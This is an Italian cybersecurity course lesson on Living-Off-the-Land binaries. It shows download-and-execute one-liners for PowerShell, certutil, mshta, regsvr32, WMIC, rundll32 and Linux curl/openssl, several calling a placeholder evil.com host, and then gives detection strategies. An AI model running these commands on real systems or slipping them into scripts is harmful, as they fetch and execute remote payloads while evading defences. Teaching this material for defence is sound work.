0Pricing
Cyber Security Academy · Lezione

Binari Living-Off-the-Land (LOLBins)

Utilizzi binari Windows affidabili (certutil, mshta, regsvr32) per eludere il rilevamento.

Binari Living-Off-the-Land (LOLBins) è una lezione Cyber Security Academy gratuita su CoddyKit. Questa è la lezione 2 di 4. Puoi leggere la lezione completa qui gratuitamente — poi esercitati direttamente nel browser con un editor di codice integrato e un tutor IA disponibile 24/7. Fa parte del percorso di apprendimento Cyber Security Academy, e i tuoi progressi si sincronizzano tra il web e l'app CoddyKit. Il corso Cyber Security Academy include 4 lezioni in totale.

Che cosa sono i LOLBin?

Living-Off-the-Land Binaries (LOLBins) sono binari e strumenti legittimi del sistema operativo riutilizzati dagli attaccanti per eseguire azioni malevole. Poiché sono strumenti di sistema attendibili e firmati, spesso eludono l'application whitelisting e riducono la possibilità che vengano rilevati da AV/EDR.

Perché i LOLBin sono efficaci

Vantaggi per gli attaccanti:

  • Sempre presenti sui sistemi di destinazione: non è necessario introdurre nuovi file
  • Firmati da Microsoft/Apple: eludono il rilevamento basato sulle firme
  • Considerati attendibili dalle soluzioni di application whitelisting
  • Generano alberi dei processi dall'aspetto legittimo

PowerShell come LOLBin

PowerShell è il LOLBin più abusato. Gli attaccanti lo utilizzano per:

# Download and execute from memory:
powershell -enc BASE64_ENCODED_COMMAND
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"

certutil

certutil.exe è uno strumento di Windows per i certificati che può scaricare file:

# Download file to disk:
certutil -urlcache -split -f http://evil.com/payload.exe C:\temp\payload.exe
# Base64 decode:
certutil -decode encoded.b64 decoded.exe

mshta e wscript

Esecuzione di script tramite host attendibili:

# mshta: execute HTA application from URL
mshta http://evil.com/payload.hta
# wscript: execute VBScript/JScript
wscript //E:VBScript evil.vbs
# cscript: console script host
cscript //nologo payload.js

regsvr32 Squiblydoo

regsvr32.exe può caricare ed eseguire DLL da URL remoti tramite i flag /s /n /u /i, eludendo AppLocker ed eseguendo codice non firmato come processo attendibile:

regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dll

WMIC ed esecuzione tramite WMI

Windows Management Instrumentation consente di eseguire codice in locale e da remoto:

# Execute command via WMI:
wmic process call create "powershell.exe -enc PAYLOAD"
# Remote execution:
wmic /node:TARGET process call create "cmd.exe /c payload.exe"

Rundll32

rundll32.exe carica ed esegue i punti di ingresso delle DLL:

# Execute a DLL export:
rundll32 evil.dll,EntryPoint
# Run JavaScript via rundll32:
rundll32 javascript:"\..\mshtml,RunHTMLApplication " payload

LOLBins Linux

Equivalenti per Linux:

# curl/wget for downloads:
curl http://evil.com/payload | bash
# Python for execution:
python3 -c "import os; os.system('whoami')"
# OpenSSL for file transfer:
openssl s_client -quiet -connect evil.com:443 | bash
# Find LOLBins: gtfobins.github.io

LOLBAS e GTFOBins

Database di riferimento:

  • LOLBAS (lolbas-project.github.io) — binari, script e librerie Windows
  • GTFOBins (gtfobins.github.io) — binari Linux/macOS per lo sfruttamento, la lettura/scrittura di file e l'escalation dei privilegi tramite SUID

Rilevare l'abuso dei LOLBin

Strategie di rilevamento:

  • Registrazione dei blocchi di script di PowerShell (EventID 4104): registra i comandi decodificati
  • Sysmon EventID 1: creazione del processo con la catena dei processi padre
  • Generazione di un avviso per relazioni padre-figlio inattese: Word → PowerShell, Excel → cmd
  • Connessioni di rete da certutil, mshta e powershell
  • Baseline UEBA per segnalare l'uso anomalo dei binari

Verifica rapida: LOLBin

Quale binario Windows può scaricare un file remoto usando il flag -urlcache?

Riepilogo della lezione

I LOLBins sono strumenti legittimi del sistema operativo riutilizzati per scopi malevoli: PowerShell, certutil, mshta, regsvr32, rundll32 e WMIC su Windows; curl, python e openssl su Linux. Eludono il rilevamento basato sulle firme e l'application whitelisting. Il rilevamento richiede la registrazione della creazione dei processi (Sysmon), la registrazione dei blocchi di script di PowerShell e baseline comportamentali. LOLBAS e GTFOBins sono database di riferimento essenziali.

Domande Frequenti

La lezione «Binari Living-Off-the-Land (LOLBins)» è gratuita?

Sì — il testo completo di «Binari Living-Off-the-Land (LOLBins)» è gratuito qui sul web. Per esercitarvi in modo interattivo (un editor di codice integrato e un tutor IA 24/7) e sbloccare il resto del corso Cyber Security Academy, passa a CoddyKit PRO. Il corso Cyber Security Academy include 4 lezioni in totale.

Cosa imparerò in «Binari Living-Off-the-Land (LOLBins)»?

Utilizzi binari Windows affidabili (certutil, mshta, regsvr32) per eludere il rilevamento. Eserciti Cyber Security Academy con codice pratico che esegui direttamente nel browser, e un tutor IA 24/7 risponde alle tue domande mentre lavori sulla lezione.

Ho bisogno di esperienza per iniziare Cyber Security Academy?

Non è richiesta alcuna esperienza precedente. Cyber Security Academy su CoddyKit è strutturato per principianti e studenti avanzati, quindi puoi iniziare da qui o dall'inizio e procedere al tuo ritmo. Questa è la lezione 2 di 4.

Quanto tempo richiede la lezione «Binari Living-Off-the-Land (LOLBins)»?

La maggior parte delle lezioni CoddyKit richiede circa 5–10 minuti. Ogni lezione è breve e interattiva, quindi fai progressi costanti e riprendi esattamente da dove hai lasciato su web e app.

Posso scrivere ed eseguire codice in questa lezione Cyber Security Academy?

Sì. Ogni lezione Cyber Security Academy include un editor di codice integrato, quindi scrivi ed esegui codice reale direttamente nel tuo browser e ricevi feedback istantaneo dall'IA — nessuna configurazione locale necessaria.

Tutte le lezioni di questo corso

  1. Framework C2: Cobalt Strike e Sliver
  2. Binari Living-Off-the-Land (LOLBins)
  3. Tecniche di movimento laterale
  4. Stesura dei report di Red Team
← Torna a Cyber Security Academy